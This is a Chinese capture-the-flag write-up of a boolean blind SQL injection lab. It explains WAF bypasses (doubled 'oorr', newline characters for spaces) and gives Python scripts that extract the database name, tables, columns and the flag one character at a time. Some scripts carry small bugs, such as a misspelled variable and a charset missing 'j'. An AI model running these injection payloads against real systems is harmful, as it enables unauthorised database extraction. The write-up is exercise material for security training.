认真一点！实验吧

题目是一个比较简单的bool盲注题目，没有错误回显，只有you are in ,you are not in 和waf的注入提醒。我用burp模糊测试了一下

发现过滤了空格，union,and,逗号等,但是没有过滤or，所以我们来用or试试看把。发现仍是you are not in.这是为什么？明明没有过滤or，可能是接收时，自动删除了or，我们可以用大小写或者双写试试。从大佬的WP中看到*貌似也呗后台改变了。因为id=0'oorr'1'='1是YOU are in  但是id=0'oorr'1'='1/**/,确实YOU are not in ，因此不能用/**/替代空格

这就说明了我们刚刚的猜测，双写或者大写均可绕过。呢么之后的爆破，就由我们的脚本来执行把。附上脚本：

#数据库长度
import requests
url="http://ctf5.shiyanbar.com/web/earnest/index.php"
str='You are in'
for i in range(1,30):
    key={'id':"0'oorr(length(database())=%s)oorr'0"%i}
    res=requests.post(url,data=key).text
    print(i)
    if str in res:
        print('length=%s'%i)
        break

#数据库名
import requests
str = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]._"
database = ''
print('start')
for i in range(1,19):
    for j in guess:
        key = {'id':"0'oorr((mid((select/**/database())from(%s)foorr(1)))='%s')oorr'0" %(i,j)}
        res = requests.post(url,data=key).text
        print('............%s......%s.......'%(i,j))
        if str in res:
            database += j
            break
print(database)
print("end!")

#报表名
import requests
url="http://ctf5.shiyanbar.com/web/earnest/index.php"
str="You are in"
guess="abcdefghiklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]._"
tables=''
print('strat')
for i in range(1,15):
    for j in guess:
        reg = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='%s')oorr'0"%(i,j)
        reg=reg.replace(' ',chr(0x0a))
        key={"id":reg}
        r=requests.post(url,data=key).text
        print(i)
        if str in r:
            tables += j
            print(tables)
            break
print(talbes)

#报列名
import requests
url="http://ctf5.shiyanbar.com/web/earnest/index.php"
str="You are in"
guess="abcdefghiklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]._"
columns=''
print('start')
for i in range(1,15):
    for j in guess:
        reg = "0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0"%(i,j)
        reg=reg.replace(' ',chr(0x0a))
        key={"id":reg}
        r=requests.post(url,data=key).text
        print(i)
        if str in r:
            columns += j
            print(columns)
            break
print(columns)

#报数据
import requests
url="http://ctf5.shiyanbar.com/web/earnest/index.php"
str="You are in"
guess="abcdefghiklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]._"
datas=''
print('start')
for i in range(1,20):
    for j in guess:
        reg = "0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='%s')oorr'0"%(i,j)
        reg=reg.replace(' ',chr(0x0a))
        key={"id":reg}
        r=requests.post(url,data=key).text
        print(i)
        if str in r:
            datas += j
            print(datas)
            break
print(datas)

 最后的-是空格

id=1'-- 是You are not in

 

 

参考了大佬的WP:https://blog.csdn.net/xiaorouji/article/details/80574986